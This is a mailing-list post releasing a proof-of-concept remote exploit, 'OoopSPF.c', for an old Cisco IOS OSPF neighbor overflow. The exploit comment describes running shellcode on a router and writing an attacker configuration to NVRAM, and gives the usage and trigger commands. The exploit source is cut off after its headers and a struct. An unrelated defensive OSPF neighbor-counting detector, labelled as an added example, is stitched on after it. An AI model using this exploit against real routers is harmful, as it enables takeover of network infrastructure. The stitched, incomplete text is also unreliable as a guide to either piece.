Cisco IOS OSPF exploit
Hi there,

attached you may find the exploit for the Cisco IOS bug ID CSCdp58462. The bug is long fixed, so if you still run OSPF on an old version of IOS, now is a good time to give your routers some attention.

FX

--
FX
Phenoelit (http://www.phenoelit.de)
672D 64B2 DE42 FCF7 8A5E E43B C0C1 A242 6D63 B564

["OoopSPF.c" (text/plain)]

/* Cisco IOS IO memory exploit prove of concept
 * by FX of Phenoelit
 * http://www.phenoelit.de
 *
 * For:
 *      19C3 Chaos Communication Congress 2002 / Berlin
 *      BlackHat Briefings Seattle 2003
 *
 * Cisco IOS 11.2.x to 12.0.x OSPF neighbor overflow
 * Cisco Bug CSCdp58462 causes more than 255 OSPF neighbors to overflow a IO memory
 * structure (small buffer header). The attached program is a PoC to exploit
 * this vulnerability by executing "shell code" on the router and write the
 * attached configuration into NVRAM to basicaly own the router.
 *
 * Example:
 * linux# gcc -o OoopSPF OoopSPF.c
 * linux# ./OoopSPF -s 172.16.0.0 -n 255.255.0.0 -d 172.16.1.4 \
 *              -f ./small.config -t 0 -a 1.2.3.4 -vv
 *
 * You can see if it worked if a) the router does not crash and b) the output of
 * "show mem io" looks like this:
 * E40E38      264 E40D04   E40F6C     1  31632D8   *Packet Data*
 * E40F6C      264 E40E38   E410A0     1  31632D8   *Packet Data*
 * E410A0      264 E40F6C   E411D4     1  31632D8   *Packet Data*
 * E411D4  1830400 E410A0   0          0  0         E411F8   808A8B8C
 *
 * Exploit has to be "triggered". In LAB environment, go to the router and say
 * box# conf t
 * box(config)# buffers small perm 0
 *
 * Greets go to the Phenoelit members, the usual suspects Halvar, Johnny Cyberpunk,
 * Svoern, Scusi, Pandzilla, and Dizzy, to the #phenoelit people,
 * Gaus of PSIRT, Nico of Securite.org and Dan Kaminsky.
 *
 * $Id: OoopSPF.c,v 1.4 2003/02/20 16:38:30 root Exp root $
 */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define IPTTL           0x80

#define BLABLA  "Phenoelit OoopSPF\n" \
                " Cisco IOS OSPF remote exploit (11.2.-12.0)\n" \
                " (C) 2002/2003 - FX of Phenoelit \n"

#define IPPROTO_OSPF    0x59
#define IP_ADDR_LEN     4

typedef struct {
        u_int8_t        ihl:4,          /* header length */
                        version:4;      /* version */
        u_int8_t        tos;            /* type of service */
        u_int16_t       tot_len;        /* total length */
        u_int16_t       id;             /* identification */
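As a defender-side companion to the bug description above (more than 255 OSPF neighbors), the following added example, which is not part of FX's post or of OoopSPF.c, counts distinct router IDs in OSPFv2 Hello headers seen on a segment and flags when the count exceeds 255. The struct and function names, the table size and the header-only sample packets are assumptions constructed for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define OSPF_HDR_LEN   24   /* OSPFv2 common header, RFC 2328 */
#define OSPF_HELLO     1    /* packet type 1 = Hello */
#define NEIGHBOR_LIMIT 255  /* from the post: more than 255 neighbors */
#define MAX_TRACKED    1024 /* assumption: table size for this sketch */
struct ospf_watch { uint32_t rid[MAX_TRACKED]; size_t count; };

/* Pull the router ID out of an OSPFv2 Hello (the IP payload); 1 on success. */
int ospf_hello_rid(const uint8_t *p, size_t len, uint32_t *rid)
{
    if (len < OSPF_HDR_LEN || p[0] != 2 || p[1] != OSPF_HELLO)
        return 0;
    size_t claimed = ((size_t)p[2] << 8) | p[3];
    if (claimed < OSPF_HDR_LEN || claimed > len)
        return 0; /* length field disagrees with the captured bytes */
    *rid = ((uint32_t)p[4] << 24) | ((uint32_t)p[5] << 16) | ((uint32_t)p[6] << 8) | p[7];
    return 1;
}

/* Feed one packet; returns 1 once distinct router IDs exceed NEIGHBOR_LIMIT. */
int ospf_watch_feed(struct ospf_watch *w, const uint8_t *p, size_t len)
{
    uint32_t rid; size_t i;
    if (ospf_hello_rid(p, len, &rid)) {
        for (i = 0; i < w->count && w->rid[i] != rid; i++) {}
        if (i == w->count && w->count < MAX_TRACKED)
            w->rid[w->count++] = rid; /* first time this router ID is seen */
    }
    return w->count > NEIGHBOR_LIMIT;
}

/* Constructed input: n header-only Hellos with router IDs 10.0.0.1 upward. */
int run_sample(unsigned n)
{
    struct ospf_watch w = { {0}, 0 };
    uint8_t pkt[OSPF_HDR_LEN] = { 2, OSPF_HELLO, 0, OSPF_HDR_LEN };
    int alert = 0;
    for (unsigned k = 0; k < n; k++) {
        uint32_t rid = 0x0A000001u + k;
        pkt[4] = (uint8_t)(rid >> 24); pkt[5] = (uint8_t)(rid >> 16); pkt[6] = (uint8_t)(rid >> 8); pkt[7] = (uint8_t)rid;
        alert = ospf_watch_feed(&w, pkt, sizeof pkt);
    }
    return alert;
}

int main(void) { printf("255: %d, 256: %d\n", run_sample(255), run_sample(256)); return 0; }
```

In practice the packets would come from a capture or span port filtered on IP protocol 89, with one `ospf_watch` per monitored segment.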